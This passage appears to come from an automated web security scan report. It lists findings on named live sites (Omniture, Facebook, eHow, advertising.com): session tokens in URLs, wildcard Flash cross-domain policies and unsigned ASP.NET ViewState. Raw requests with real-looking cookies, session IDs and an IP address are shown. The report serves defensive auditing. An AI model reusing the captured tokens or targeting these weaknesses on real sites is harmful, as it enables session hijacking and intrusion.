http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard?mboxHost=www.millenniumhotels.com&mboxSession=1296573995979-796819&mboxPage=1296573995979-796819&screenHeight=1200&screenWidth=1920&browserWidth=1036&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&pageType=HOMEPAGE&pageName=MILLENNIUM%20HOTEL%20USA&hotelId=11536&mbox=global&mboxId=0&mboxTime=1296552395984&mboxURL=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston&mboxVersion=39

Request

GET /m2/millenniumhotels/mbox/standard?mboxHost=www.millenniumhotels.com&mboxSession=1296573995979-796819&mboxPage=1296573995979-796819&screenHeight=1200&screenWidth=1920&browserWidth=1036&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&pageType=HOMEPAGE&pageName=MILLENNIUM%20HOTEL%20USA&hotelId=11536&mbox=global&mboxId=0&mboxTime=1296552395984&mboxURL=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston&mboxVersion=39 HTTP/1.1
Host: millenniumhotels.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 87
Date: Tue, 01 Feb 2011 15:25:52 GMT
Server: Test & Target

mboxFactories.get('default').get('global',0).setOffer(new mboxOfferDefault()).loaded();

8.25. https://my.omniture.com/p/suite/1.2/index.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://my.omniture.com
Path:	/p/suite/1.2/index.html

Issue detail

The URL in the request appears to contain a session token within the query string:

https://my.omniture.com/p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132

Request

GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

8.26. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://omnituremarketing.tt.omtrdc.net
Path:	/m2/omnituremarketing/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1296661217505-786518&mboxPage=1296661217505-786518&mboxCount=1&profile.geo_ip=173.193.214.243&profile.geo_zip=75207&profile.geo_gmt_offset=-600&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=tx&profile.geo_region_code=44&profile.geo_city=dallas&profile.geo_city_code=77&mbox=omniTargetingInfo&mboxId=0&mboxTime=1296639617508&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fprivacy%2F2o7%3Ff%3D2o7&mboxReferrer=&mboxVersion=38

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1296661217505-786518&mboxPage=1296661217505-786518&mboxCount=1&profile.geo_ip=173.193.214.243&profile.geo_zip=75207&profile.geo_gmt_offset=-600&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=tx&profile.geo_region_code=44&profile.geo_city=dallas&profile.geo_city_code=77&mbox=omniTargetingInfo&mboxId=0&mboxTime=1296639617508&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fprivacy%2F2o7%3Ff%3D2o7&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 2561
Date: Wed, 02 Feb 2011 15:39:26 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('omniTargetingInfo',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...

8.27. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://omnituremarketing.tt.omtrdc.net
Path:	/m2/omnituremarketing/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1296661217505-786518&mboxPC=1296661217505-786518.17&mboxPage=1296661228550-462434&mboxCount=13&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1296639646146&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1036&browserHeight=1012&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F&mboxReferrer=&mboxVersion=38&scPluginVersion=1

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1296661217505-786518&mboxPC=1296661217505-786518.17&mboxPage=1296661228550-462434&mboxCount=13&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1296639646146&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1036&browserHeight=1012&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Wed, 02 Feb 2011 15:39:55 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1296661217505-786518.17");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

8.28. http://track.roiservice.com/track/LogToDb.asp.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://track.roiservice.com
Path:	/track/LogToDb.asp.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

http://track.roiservice.com/track/LogToDb.asp.aspx?merchantid=936138107000019&merchantsessionid=a2cc436f07764ff0bdfc512bb07215f0&description=LandingPage&pgurl=http%3A//www.millenniumhotels.com/millenniumboston/index.html&amount=0&orderid=&cid=&sm=&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium+boston&nsid=a2cc436f07764ff0bdfc512bb07215f0

Request

GET /track/LogToDb.asp.aspx?merchantid=936138107000019&merchantsessionid=a2cc436f07764ff0bdfc512bb07215f0&description=LandingPage&pgurl=http%3A//www.millenniumhotels.com/millenniumboston/index.html&amount=0&orderid=&cid=&sm=&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium+boston&nsid=a2cc436f07764ff0bdfc512bb07215f0 HTTP/1.1
Host: track.roiservice.com
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: msid938956107000029=06dd214c75b14fd39004a5e41502868d; msid936138107000019=a2cc436f07764ff0bdfc512bb07215f0; GTT936138107000019=a2cc436f07764ff0bdfc512bb07215f0

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:25:56 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: msid936138107000019=a2cc436f07764ff0bdfc512bb07215f0; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

8.29. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=63203377906&app_id=63203377906&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3ad1d680%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff4214cf38%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df205b77b54%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df32c632318%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff4214cf38%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205b77b54&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df5768ec9c%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff4214cf38%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205b77b54&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df23edcb08%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff4214cf38%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205b77b54&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=63203377906&app_id=63203377906&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3ad1d680%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff4214cf38%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df205b77b54%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df32c632318%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff4214cf38%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205b77b54&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df5768ec9c%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff4214cf38%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205b77b54&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df23edcb08%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff4214cf38%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205b77b54&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dconstantcontact.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.constantcontact.com%252Findex.jsp%26extra_2%3DUS; lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=f5768ec9c&origin=http%3A%2F%2Fwww.ehow.com%2Ff4214cf38&relation=parent&transport=postmessage&frame=f205b77b54
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 15:11:22 GMT
Content-Length: 0

9. Flash cross-domain policy previous next
There are 3 instances of this issue:

http://pics.plentyoffish.com/crossdomain.xml
http://pixel.facebook.com/crossdomain.xml
http://www.evow.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

9.1. http://pics.plentyoffish.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pics.plentyoffish.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: pics.plentyoffish.com

Response

HTTP/1.0 200 OK
Content-Length: 225
Content-Type: text/xml
Last-Modified: Fri, 05 Jun 2009 16:52:36 GMT
Accept-Ranges: bytes
ETag: "f4f03b7fee5c91:1146"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 01:34:06 GMT
Connection: close
Cache-Control: max-age=2147483647;post-check=31449600,pre-check=31449600

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.plentyoffish.com" />
...[SNIP]...

9.2. http://pixel.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pixel.facebook.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
Connection: close
Content-Length: 1581

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="external.ak.fbcdn.com" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...

9.3. http://www.evow.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.evow.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evow.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 07 Dec 2010 01:18:10 GMT
Accept-Ranges: bytes
ETag: "a4dcf9cac95cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 01:34:05 GMT
Connection: close
Content-Length: 211

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.evow.com" />
</cross-dom
...[SNIP]...

10. ASP.NET ViewState without MAC enabled previous next
There are 7 instances of this issue:

http://beta-ads.ace.advertising.com/
http://p.ace.advertising.com/
http://r1-ads.ace.advertising.com/
http://r1.ace.advertising.com/
http://www.ehow.com/account/simple_register.aspx
https://www.ehow.com/account/simple_register.aspx
https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

10.1. http://beta-ads.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://beta-ads.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: beta-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1402
Date: Tue, 01 Feb 2011 15:30:27 GMT
Connection: close
Set-Cookie: A07L=CT; expires=Tue, 01-Mar-2011 15:30:27 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

10.2. http://p.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://p.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: p.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:38:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

10.3. http://r1-ads.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; F1=BAWJI1EBAAAABAAAAIAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=TPQQKfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BSIFyat6oE!; ACID=WR910012964108340027; 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3TghwGitSqzY5976PrTsin6rxpK73x54NJs1OwWgDjYYaZeaDswzMIA; C2=eVCSNNbjHEEqGhO; 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; ROLL=gqwLbPcy+hFCk4Ept5x+lCN!; 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_;

Response

10.4. http://r1.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: r1.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:40:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

10.5. http://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_register.aspx

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Register fo
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgwODk0NDY4D2QWAmYPZBYCAgEPZBYCAhAPDxYCHghJbWFnZVVybAViaHR0cHM6Ly93d3cuZWhvdy5jb20vZm9ybXMvU3VwcG9ydC9EaXNwbGF5Q2FwdGNoYUltYWdlLmFzcHg/dD1HJTJmJTJmV3l4MDlDUyUyYiUyYk85NHp6dDNNSHclM2QlM2RkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMY2JsRW1haWxTdWJz" />
...[SNIP]...

10.6. https://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/account/simple_register.aspx

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:08 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Register fo
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgwODk0NDY4D2QWAmYPZBYCAgEPZBYCAhAPDxYCHghJbWFnZVVybAVaaHR0cHM6Ly93d3cuZWhvdy5jb20vZm9ybXMvU3VwcG9ydC9EaXNwbGF5Q2FwdGNoYUltYWdlLmFzcHg/dD11bkhPWHRUc1lkcE13ekVQc0plSjNRJTNkJTNkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDGNibEVtYWlsU3Vicw==" />
...[SNIP]...

10.7. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/Support/DisplayCaptchaImage.aspx

Request

